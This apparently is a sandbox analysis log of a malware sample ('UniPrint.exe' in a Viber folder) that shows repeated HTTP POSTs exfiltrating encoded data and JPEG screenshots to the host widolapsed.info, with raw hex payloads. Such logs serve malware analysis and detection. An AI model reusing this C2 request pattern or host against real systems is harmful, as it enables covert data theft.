                                                                                                      2021-09-15 11:46:49 UTC3028OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:49 UTC3044OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:49 UTC3060OUTData Raw: 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97 71 3d 49 a5 cd 34 52 d2 b1 6a 4d 8e a7 0a
                                                                                                      Data Ascii: RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*q=I4RjM
                                                                                                      2021-09-15 11:46:49 UTC3076OUTData Raw: 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97 34 ae 3b 0b 9a 5c d3 69 33 45 c2 c3 a8 cd
                                                                                                      Data Ascii: (hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa64;\i3E
                                                                                                      2021-09-15 11:46:49 UTC3086OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 31 36 35 39 32 33 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2981659231--
                                                                                                      2021-09-15 11:46:49 UTC3086INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:49 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=32371b8918f49d051f052c88f77c2d32944b512750ae9f6e1292643728beeb53; expires=Thu, 15-Sep-2022 11:46:49 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:49 UTC3087INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.34975645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:29 UTC310OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81298
                                                                                                      Content-Type: multipart/form-data; boundary=--------3135628383
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:29 UTC310OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 33 35 36 32 38 33 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3135628383Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:29 UTC310OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 5a c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${OweZ0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:29 UTC311OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:29 UTC327OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:29 UTC343OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:29 UTC358OUTData Raw: 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63 b3 4e 06 a3 a7 8a 4d 14 98 fa 51 4d 14 b5 26 89 8e a7 0a 60 34 ec 8a 45 26 3b 34 e1 4c cd 2e 4d 4b 45 a6 49 45 34 13 4b f5 34 9a 29 31 e2 97 22 a3 de 83 ab 0f ce 98 d7 30 27 57 06 97 2b 0e 74 ba 96 41 f9 4f d2 b8 cf 14 7f c7 ec 5f f5 c8 57 4c 75 28 17 20 64 d7 33 e2 53 9b b8 4f fd 32 1f ce aa 31 6b 70 53 52 96 87 17 45 15 b9 78 52 1f 0b e9 c6 39 74 f8 de 68 5c bc 6f 6a 1a 69 4f 9a c3 21 f6 1c 60 0f ef 0e 95 c0 dd ac 7a e9 5c c4 a5 0c ca ac 15 88 0c 30 c0 1e bd eb aa d5 20 b7 93 c5 13 5a 93 61 2d bd b9 9a 41 6d 6d 6d e5 30 d8 85 82 3b 04 5c e7 18 e0 9e f5 56 d9 5f 50 8e d2 4b 85 d3 1e 3b c3 35 ba
                                                                                                      Data Ascii: OY-rzVtj9jVZovK)iX&S74ZcNMQM&`4E&;4L.MKEIE4K4)1"0'W+tAO_WLu( d3SO21kpSRExR9th\ojiO!`z\0 Za-Ammm0;\V_PK;5
                                                                                                      2021-09-15 11:45:29 UTC374OUTData Raw: 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 64 b7 77 d0 04 79 ed 2d 84 6d 22 21 29 70 c4 8d cc 17 38 28 33 d7 d6 9f 23 fe 9a 17 3a fe 93 2f d1 45 15 05 85 79 5f c5 8f f9 0c d9 7f d7 03 fc eb d5 2b ca fe
                                                                                                      Data Ascii: (~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZSdwy-m"!)p8(3#:/Ey_+
                                                                                                      2021-09-15 11:45:29 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 33 35 36 32 38 33 38 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3135628383--
                                                                                                      2021-09-15 11:45:30 UTC390INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:29 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=794ba9da7d30af93b6fc902d2891bc2702299c6e807298e370a1b3f70798c8de; expires=Thu, 15-Sep-2022 11:45:29 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:30 UTC390INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.34983145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:50 UTC3087OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76646
                                                                                                      Content-Type: multipart/form-data; boundary=--------3817058548
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 31 37 30 35 38 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3817058548Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 92 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:50 UTC3103OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:50 UTC3119OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:50 UTC3135OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:50 UTC3151OUTData Raw: a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57 1d 85 cd 2e 69 b4 99 a2 e1 61 d4 66 93 34 51 70 b0 ec d2 1a 4a 33 4e e1 60 a2 92 8a 40 2d 19 a4 a2 80 b0 b9 a2 9b 9a 33 4a e3 b0 b5 d8 f8 03 56 b3 d1 6d 75 ab db e9 36 a2 ac 01 54 72 d2 37 ef 30 aa 3b 9f ff 00 59 c0 04 d7 19 9a 4c 0c e7 03 3e b5 13 8f 32 b1 70 97 2b b9 d9 78 ff 00 57 b5 d4 6e 60 54 d3 b0 e6 18 e6 b6 bd 13
                                                                                                      Data Ascii: ((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW.iaf4QpJ3N`@-3JVmu6Tr70;YL>2p+xWn`T
                                                                                                      2021-09-15 11:46:50 UTC3162OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 31 37 30 35 38 35 34 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3817058548--
                                                                                                      2021-09-15 11:46:50 UTC3162INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:50 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cb6ef9a4c506285ad9bea51bb69448cc50b60d3866c545b924977e8a9c20c620; expires=Thu, 15-Sep-2022 11:46:50 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:50 UTC3162INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.34983245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
